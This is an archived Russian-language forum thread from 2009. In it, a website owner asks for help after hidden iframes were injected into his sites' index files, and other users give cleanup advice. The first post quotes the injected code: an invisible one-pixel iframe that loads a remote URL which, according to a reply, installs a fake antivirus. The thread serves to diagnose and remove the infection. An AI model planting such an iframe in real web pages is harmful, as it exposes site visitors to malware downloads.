Вход

Просмотр полной версии : Вирус взломал сайт, помогите побороть его =)



Шмурзилка
08.01.2009, 08:02
Я держу несколько сайтов на одном ftp аккаунте, неожиданно для меня некоторые сайты перестали работать а некоторые со всплывающим окном типа скачай чето там, на которую ругается NOD32, проверив структура сайта я заметил то что во все index.php и index.html вставился такой код <iframe src="http://litedownloadseek.cn/in.cgi?cocacola3" width=1 height=1 style="visibility: hidden"></iframe>

Один из сайтов у меня на Джумле где в каждом модуле есть index.html покопаться пришлось прилично, но прошло около суток и опять, сменил фтп пароль заново исправляю index.html, но я так думаю что нифига из этого не выйдет,NOD32 вирус не находит, обновляется регулярно помогите удалить этот вирус с компьютера, где он может находится, или посоветуйте какуюнить прогу для отслеживания системы.
для примера адрес сайта: http://rnr-music.ru
(еще не все индексы переправил так что можно посмотреть на действие этого червя, З.Ы. А вот уже на него НОД32 ругается)
З.Ы. Извиняюсь раздел перепутал, вы не удаляйте пожалуйста, перенесите =)

zerocorporated
08.01.2009, 08:51
Выполните правила раздела "Помогите!", там как рас лечат ПК. (http://virusinfo.info/showthread.php?t=1235)

Добавлено через 26 минут

Ссылку, которую вы дали используют для установки поддельного антивируса.

http://www.virustotal.com/ru/analisis/2e582781e70a7b0eccfee151565f4623

zerocorporated
08.01.2009, 08:56
:megalol: На вторую строчку внимания обратите... сам себя сдал :megalol:

Шмурзилка
08.01.2009, 10:43
в том то и фишка что вирус который с сайта грузится антивирусами опознается а тот вирус который это все в сайты пихает нет

valho
08.01.2009, 11:57
У них по этим лже-антивирусам есть целая шарашкина контора, сайт, у меня где то есть скрины с их взломанного сайта (откуда то скачивал, не помню :search: ), целая система, с базами данных, для спамеров, адресами сайтов, сколько денег у кого заработано и т.д. и т.п.

zerocorporated
08.01.2009, 11:58
в том то и фишка что вирус который с сайта грузится антивирусами опознается а тот вирус который это все в сайты пихает нет

Ссылку на правила раздела помогите я уже дал. Там ваш ПК вылечат.

Последовательность действий такая:
1. Вылечить свой ПК.
2. Сменить пароль на админ панель сайта (Остальные тоже желательно поменять, включая почту...)
3. Восстановить сайт из резервной копии или проверять его вручную/антивирусами...

priv8v
08.01.2009, 21:52
Также стоит прочитать эти темы:
http://virusinfo.info/showthread.php?t=9116
http://virusinfo.info/showthread.php?t=36688

Читать немного - всего минут 10. Но полезно будет.